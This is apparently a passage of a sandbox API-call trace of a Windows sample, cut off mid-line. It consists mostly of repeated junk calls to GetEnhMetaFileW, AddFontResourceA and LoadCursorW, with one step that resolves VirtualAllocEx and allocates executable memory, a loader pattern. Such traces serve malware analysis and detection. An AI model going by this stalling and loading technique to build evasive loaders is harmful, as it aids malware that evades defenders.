GetEnhMetaFileW (lpName="") returned 0x0 [0136.594] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.595] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.596] GetEnhMetaFileW (lpName="") returned 0x0 [0136.597] GetEnhMetaFileW (lpName="") returned 0x0 [0136.597] GetEnhMetaFileW (lpName="") returned 0x0 [0136.597] GetEnhMetaFileW (lpName="") returned 0x0 [0136.597] GetEnhMetaFileW (lpName="") returned 0x0 [0136.597] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.598] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.599] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0136.600] GetEnhMetaFileW (lpName="") returned 0x0 [0139.004] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] AddFontResourceA (param_1="") returned 0 [0139.005] LoadLibraryA (lpLibFileName="kernel32") returned 0x75c50000 [0139.005] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAllocEx") returned 0x75c7d9b0 [0139.006] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x7804, flAllocationType=0x1000, flProtect=0x40) returned 0x160000 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.007] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.008] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.009] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.010] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.011] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.012] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.013] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.014] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.015] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.016] AddFontResourceA (param_1="") returned 0 [0139.017] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.017] DeleteObject (ho=0x0) returned 0 [0139.017] DeleteObject (ho=0x0) returned 0 [0139.017] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.018] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] DeleteObject (ho=0x0) returned 0 [0139.019] DeleteObject (ho=0x0) returned 0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.019] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.020] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] DeleteObject (ho=0x0) returned 0 [0139.021] DeleteObject (ho=0x0) returned 0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.021] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW 